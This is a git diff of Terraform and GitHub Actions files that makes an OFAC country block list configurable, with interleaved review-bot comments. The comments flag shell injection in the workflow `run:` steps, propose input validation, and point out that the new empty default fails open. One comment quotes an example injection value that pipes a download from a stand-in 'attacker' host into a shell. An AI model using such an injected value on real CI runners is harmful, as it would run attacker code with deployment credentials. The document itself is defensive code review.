diff --git a/.github/workflows/sub-infra-apply.yml b/.github/workflows/sub-infra-apply.yml
index 898ad05..555538b 100644
--- a/.github/workflows/sub-infra-apply.yml
+++ b/.github/workflows/sub-infra-apply.yml
@@ -79,6 +79,7 @@ jobs:
 id: configure-tfvars
 working-directory: ${{ vars.TF_DIRECTORY }}
 run: |
+ echo 'ofac_blocked_countries="${{ vars.OFAC_BLOCKED_COUNTRIES }}"' >> plan.auto.tfvars
 echo 'image_version="${{ inputs.version }}"' >> plan.auto.tfvars
 echo 'grafana_auth="${{ steps.grafana-get-key.outputs.key }}"' >> plan.auto.tfvars
diff --git a/.github/workflows/sub-infra-plan.yml b/.github/workflows/sub-infra-plan.yml
index 3674acc..d5c3654 100644
--- a/.github/workflows/sub-infra-plan.yml
+++ b/.github/workflows/sub-infra-plan.yml
@@ -83,6 +83,7 @@ jobs:
 - name: Configure Terraform Variables
 working-directory: ${{ vars.TF_DIRECTORY }}
 run: |
+ echo 'ofac_blocked_countries="${{ vars.OFAC_BLOCKED_COUNTRIES }}"' >> plan.auto.tfvars
 echo 'image_version="${{ inputs.version }}"' >> plan.auto.tfvars
 echo 'grafana_auth="${{ steps.grafana-get-key.outputs.key }}"' >> plan.auto.tfvars
diff --git a/terraform/README.md b/terraform/README.md
index c756d96..00a5fbb 100644
--- a/terraform/README.md
+++ b/terraform/README.md
@@ -26,7 +26,7 @@ Now you can apply the changes:
 | Name | Version |
 |------|---------|
-| [aws](#provider\_aws) | 5.12.0 |
+| [aws](#provider\_aws) | 5.17.0 |
 | [random](#provider\_random) | 3.5.1 |
 | [terraform](#provider\_terraform) | n/a |
 ## Modules
@@ -48,6 +48,7 @@ Now you can apply the changes:
 |------|-------------|------|---------|:--------:|
 | [betterstack\_cloudwatch\_webhook](#input\_betterstack\_cloudwatch\_webhook) | The BetterStack webhook to send CloudWatch alerts to |
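Review bot: The added line expands `${{ vars.OFAC_BLOCKED_COUNTRIES }}` directly into the `run:` script text before the shell parses it, so a repository or organization variable containing a single quote or `$(...)` is executed on the apply runner (which holds the credentials `terraform apply` uses) instead of being written as data; repository variables are not secrets, are editable by anyone with access to repository settings, and go through no review. The pre-existing `inputs.version` and `steps.grafana-get-key.outputs.key` lines have the same shape, but this one adds a new, externally editable source. Pass the value through `env:` so the shell only ever sees it as a variable, and write the tfvars line with `printf`; a value containing `"` will then break the HCL parse and fail the plan rather than run as shell. The step's `- name:` line and the rest of the job are outside the hunk.
```yaml
      env:
        OFAC_BLOCKED_COUNTRIES: ${{ vars.OFAC_BLOCKED_COUNTRIES }}
      run: |
        printf 'ofac_blocked_countries="%s"\n' "$OFAC_BLOCKED_COUNTRIES" >> plan.auto.tfvars
        # … unchanged: image_version and grafana_auth lines …
```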
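Review bot: In the plan workflow the same `${{ vars.OFAC_BLOCKED_COUNTRIES }}` is substituted into the `run:` body at template-expansion time, so a repository variable such as `'; curl attacker | sh; '` runs on the plan runner, which presumably carries the cloud credentials needed for `terraform plan`. The value should reach the shell only as an environment variable: add `env:` / `OFAC_BLOCKED_COUNTRIES: ${{ vars.OFAC_BLOCKED_COUNTRIES }}` to the step and replace the echo with `printf 'ofac_blocked_countries="%s"\n' "$OFAC_BLOCKED_COUNTRIES" >> plan.auto.tfvars`. The preceding step lines and the job definition are outside the hunk.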
string
| n/a
| yes |
| [betterstack\_prometheus\_webhook](#input\_betterstack\_prometheus\_webhook) | The BetterStack webhook to send Prometheus alerts to | string
| n/a
| yes |
+| [geoip\_db\_key](#input\_geoip\_db\_key) | The name to the GeoIP database | string
| "GeoLite2-City.mmdb"
| no |
| [grafana\_auth](#input\_grafana\_auth) | The API Token for the Grafana instance | string
| ""
| no |
| [image\_version](#input\_image\_version) | The version of the image to deploy | string
| n/a
| yes |
| [keystore\_primary\_instance\_class](#input\_keystore\_primary\_instance\_class) | The instance class of the primary docdb instances | string
| n/a
| yes |
@@ -56,6 +57,7 @@ Now you can apply the changes:
| [keystore\_replica\_instance\_count](#input\_keystore\_replica\_instance\_count) | The number of replica docdb instances to deploy | number
| n/a
| yes |
| [log\_level](#input\_log\_level) | Defines logging level for the application | string
| n/a
| yes |
| [notification\_channels](#input\_notification\_channels) | The notification channels to send alerts to | list(any)
| []
| no |
+| [ofac\_blocked\_countries](#input\_ofac\_blocked\_countries) | The list of countries to block | string
| ""
| no |
## Outputs
No outputs.
diff --git a/terraform/ecs/README.md b/terraform/ecs/README.md
index 8636cab..f353c9e 100644
--- a/terraform/ecs/README.md
+++ b/terraform/ecs/README.md
@@ -31,11 +31,14 @@ This module creates an ECS cluster and an autoscaling group of EC2 instances to
| [allowed\_lb\_ingress\_cidr\_blocks](#input\_allowed\_lb\_ingress\_cidr\_blocks) | A list of CIDR blocks to allow ingress access to the load-balancer. | string
| n/a
| yes |
| [context](#input\_context) | Single object for setting entire context at once.any
| n/a
| yes |
| [ecr\_repository\_url](#input\_ecr\_repository\_url) | The URL of the ECR repository where the app image is stored | string
| n/a
| yes |
+| [geoip\_db\_bucket\_name](#input\_geoip\_db\_bucket\_name) | The name of the S3 bucket where the GeoIP database is stored | string
| n/a
| yes |
+| [geoip\_db\_key](#input\_geoip\_db\_key) | The key of the GeoIP database in the S3 bucket | string
| n/a
| yes |
| [image\_version](#input\_image\_version) | The version of the app image to deploy | string
| n/a
| yes |
| [keystore\_addr](#input\_keystore\_addr) | The address of the MongoDB instance to use for the persistent keystore | string
| n/a
| yes |
| [log\_level](#input\_log\_level) | Defines logging level for the application | string
| n/a
| yes |
| [max\_capacity](#input\_max\_capacity) | Maximum number of instances in the autoscaling group | number
| 8
| no |
| [min\_capacity](#input\_min\_capacity) | Minimum number of instances in the autoscaling group | number
| 2
| no |
+| [ofac\_blocked\_countries](#input\_ofac\_blocked\_countries) | The list of countries to block | string
| n/a
| yes |
| [port](#input\_port) | The port the app listens on | number
| n/a
| yes |
| [private\_subnets](#input\_private\_subnets) | The IDs of the private subnets to deploy to | list(string)
| n/a
| yes |
| [prometheus\_endpoint](#input\_prometheus\_endpoint) | The endpoint of the Prometheus server to use for monitoring | string
| n/a
| yes |
diff --git a/terraform/ecs/cluster.tf b/terraform/ecs/cluster.tf
index c37e454..1f80d31 100644
--- a/terraform/ecs/cluster.tf
+++ b/terraform/ecs/cluster.tf
@@ -81,7 +81,7 @@ resource "aws_ecs_task_definition" "app_task" {
{ "name" = "GEOIP_DB_BUCKET", "value" = var.geoip_db_bucket_name },
{ "name" = "GEOIP_DB_KEY", "value" = var.geoip_db_key },
- { "name" = "BLOCKED_COUNTRIES", "value" = "KP,IR,CU,SY" },
+ { "name" = "BLOCKED_COUNTRIES", "value" = var.ofac_blocked_countries },
],
portMappings = [
diff --git a/terraform/ecs/variables.tf b/terraform/ecs/variables.tf
index 8c06c4e..c42c771 100644
--- a/terraform/ecs/variables.tf
+++ b/terraform/ecs/variables.tf
@@ -91,6 +91,11 @@ variable "log_level" {
type = string
}
+variable "ofac_blocked_countries" {
+ description = "The list of countries to block"
+ type = string
+}
+
#---------------------------------------
# Monitoring
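Review bot: The new variable is written unvalidated into the task definition's `BLOCKED_COUNTRIES` environment variable, and its description says nothing about the expected format, so a value with spaces, lower-case codes or a stray quote (the string originates from a GitHub repository variable) is only discovered when the application parses it at runtime. Add a `validation` block that pins the comma-separated two-letter format of the value this replaces, `KP,IR,CU,SY`, so `terraform plan` rejects malformed input, and state the format in the description. I have left the empty string allowed because the root module passes `""` by default; tightening that is a separate decision. A `list(string)` joined with `join(",", ...)` in cluster.tf would be the more idiomatic type but changes the module interface, so `string` is kept here.
```hcl
variable "ofac_blocked_countries" {
  description = "Comma-separated two-letter country codes to block, e.g. \"KP,IR,CU,SY\" (the format of the previous hard-coded value); passed verbatim to the app as BLOCKED_COUNTRIES"
  type        = string

  validation {
    condition     = can(regex("^([A-Z]{2}(,[A-Z]{2})*)?$", var.ofac_blocked_countries))
    error_message = "ofac_blocked_countries must be a comma-separated list of two-letter upper-case country codes with no spaces, or empty."
  }
}
```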
diff --git a/terraform/monitoring/README.md b/terraform/monitoring/README.md
index 26dc7b6..9b707cc 100644
--- a/terraform/monitoring/README.md
+++ b/terraform/monitoring/README.md
@@ -38,9 +38,7 @@ Configure the Grafana dashboards for the application
| [prometheus\_endpoint](#input\_prometheus\_endpoint) | The endpoint for the Prometheus server. | string
| n/a
| yes |
## Outputs
-| Name | Description |
-|------|-------------|
-| [dashboard\_definition](#output\_dashboard\_definition) | The JSON definition of the dashboard. |
+No outputs.
diff --git a/terraform/res_application.tf b/terraform/res_application.tf
index 286a767..8bf3656 100644
--- a/terraform/res_application.tf
+++ b/terraform/res_application.tf
@@ -27,9 +27,10 @@ module "ecs" {
allowed_lb_ingress_cidr_blocks = module.vpc.vpc_cidr_block
# Application
- port = 8080
- keystore_addr = module.keystore.connection_url
- log_level = var.log_level
+ port = 8080
+ keystore_addr = module.keystore.connection_url
+ log_level = var.log_level
+ ofac_blocked_countries = var.ofac_blocked_countries
# Monitoring
prometheus_endpoint = aws_prometheus_workspace.prometheus.prometheus_endpoint
diff --git a/terraform/variables.tf b/terraform/variables.tf
index 968d8fb..9224ae4 100644
--- a/terraform/variables.tf
+++ b/terraform/variables.tf
@@ -31,6 +31,11 @@ variable "log_level" {
type = string
}
+variable "ofac_blocked_countries" {
+ description = "The list of countries to block"
+ type = string
+ default = ""
+}
#-------------------------------------------------------------------------------
# Keystore
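Review bot: `default = ""` turns the block list from a hard-coded `KP,IR,CU,SY` into fail-open: any environment that omits the variable now deploys with `BLOCKED_COUNTRIES` empty, and the CI workflows always write `ofac_blocked_countries=""` when the `OFAC_BLOCKED_COUNTRIES` repository variable is unset, so the root default is never even reached from CI and nothing in the plan output flags the change. For a sanctions control I would keep the previous list as the default, `default = "KP,IR,CU,SY"`, so an unset variable preserves the old behaviour, and have the workflows write the tfvars line only when the repository variable is non-empty. If an empty list is an intended configuration for some environments, the description should say so and the reviewer of each plan should expect to see it. How the application treats an empty `BLOCKED_COUNTRIES` value is not visible here.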